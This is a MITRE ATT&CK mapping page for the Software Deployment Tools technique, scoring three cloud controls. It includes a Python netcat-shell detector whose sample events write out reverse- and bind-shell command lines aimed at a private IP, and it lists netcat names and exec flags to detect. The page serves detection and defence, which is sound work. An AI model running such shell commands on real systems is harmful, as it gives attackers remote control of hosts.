T1072 Software Deployment Tools Mappings

Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris).

Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

The permissions required for this action vary by system configuration: local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. In either case, the system may require an administrative account to log in or to perform its intended purpose.

View in MITRE ATT&CK®

Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
artifact_registry | Artifact Registry | technique_scores | T1072 | Software Deployment Tools | (none)
Comments: Once this control is deployed, it can detect changes to the system packages and container images it stores.
References: none listed
chronicle | Chronicle | technique_scores | T1072 | Software Deployment Tools | (none)
Comments: Chronicle is able to trigger alerts based on suspicious activity on a Linux host that could indicate a bind or reverse shell using the Netcat tool. Note: this rule requires auditbeat to be installed on the host to function properly. This technique was scored as Minimal because of the low or uncertain detection coverage factor. https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/linux/possible_bind_or_reverse_shell_via_netcat__auditbeat_for_linux.yaral
References: none listed
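The Chronicle comment above only names the rule; to make the kind of detection it performs concrete, here is an added Python example (written for this page, not the Chronicle rule and not the project's own code) that applies a netcat bind/reverse-shell heuristic to auditbeat-style process events. The event shape, host names, IP addresses and command lines are constructed for the example and are not real captured data; the rule's actual YARA-L logic is in the linked repository.

```python
"""Heuristic detector for netcat bind/reverse shells in auditbeat-style process events.

Added example for this mapping page; it is not the Chronicle rule itself.
"""
import os
import re
import shlex

# Constructed sample events shaped like auditbeat `process_started` records.
# These are made up for the example, not captured telemetry.
SAMPLE_EVENTS = [
    {"host": {"name": "web-01"}, "event": {"action": "process_started"},
     "process": {"args": ["nc", "-lvp", "4444", "-e", "/bin/bash"]}},          # bind shell
    {"host": {"name": "web-01"}, "event": {"action": "process_started"},
     "process": {"args": ["/usr/bin/ncat", "10.0.0.5", "9001", "-e", "/bin/sh"]}},  # reverse shell
    {"host": {"name": "db-02"}, "event": {"action": "process_started"},
     "process": {"args": ["nc", "-z", "10.0.0.7", "5432"]}},                   # benign port check
    {"host": {"name": "db-02"}, "event": {"action": "process_stopped"},
     "process": {"args": ["nc", "-e", "/bin/sh", "10.0.0.5", "443"]}},         # not a start event
    {"host": {"name": "app-03"}, "event": {"action": "process_started"},
     "process": {"args": ["sh", "-c",
                          "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 "
                          "| nc 10.0.0.5 4444 > /tmp/f"]}},                    # fifo variant
]

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}   # flags that attach a program to the socket
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def classify_netcat(args):
    """Classify a netcat argv as 'bind', 'reverse', or None when no shell is attached."""
    if not args or os.path.basename(args[0]) not in NETCAT_NAMES:
        return None
    attaches_shell = False
    listening = False
    for arg in args[1:]:
        if arg in EXEC_FLAGS:
            attaches_shell = True
        elif arg.startswith("-") and not arg.startswith("--"):
            # short flags may be bundled (e.g. -lvp); "l" means listen
            listening = listening or "l" in arg[1:]
    if not attaches_shell:
        return None
    return "bind" if listening else "reverse"


def classify_shell_pipe(args):
    """Catch the mkfifo/pipe variant used when nc lacks -e: sh -c '... | nc host port > fifo'."""
    if len(args) < 3 or os.path.basename(args[0]) not in SHELLS or args[1] != "-c":
        return None
    try:
        stages = [shlex.split(s) for s in re.split(r"[|;]", args[2]) if s.strip()]
    except ValueError:            # unbalanced quotes; do not crash the pipeline
        return None
    stages = [s for s in stages if s]
    shell_stage = any(os.path.basename(s[0]) in SHELLS for s in stages)
    nc_stages = [s for s in stages if os.path.basename(s[0]) in NETCAT_NAMES]
    if not (shell_stage and nc_stages):
        return None
    listening = any(a.startswith("-") and "l" in a[1:] for a in nc_stages[0][1:])
    return "bind" if listening else "reverse"


def detect(events):
    """Return one alert per process_started event that looks like a netcat shell."""
    alerts = []
    for ev in events:
        if ev.get("event", {}).get("action") != "process_started":
            continue
        args = ev.get("process", {}).get("args") or []
        kind = classify_netcat(args) or classify_shell_pipe(args)
        if kind:
            alerts.append({"host": ev["host"]["name"], "kind": kind,
                           "cmdline": " ".join(args)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['host']}: possible netcat {alert['kind']} shell: {alert['cmdline']}")
```

The `-z` port check and the `process_stopped` record are deliberately included as non-alerting input; the heuristic keys on a socket-attached program (`-e`, `-c`, `--exec`, `--sh-exec`) or the fifo-and-pipe pattern, so a plain netcat connection does not fire. A renamed or statically linked binary defeats the name check, which is one reason the page scores this coverage as Minimal.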
vmmanager | VM Manager | technique_scores | T1072 | Software Deployment Tools | (none)
Comments: VM Manager can apply on-demand and scheduled patches via automated patch deployment. This can remediate OS and software vulnerabilities that could otherwise be exploited. Since VM Manager does not directly prevent exploitation of vulnerabilities that are already being exploited (including zero-day vulnerabilities), this control is scored Partial.
References: none listed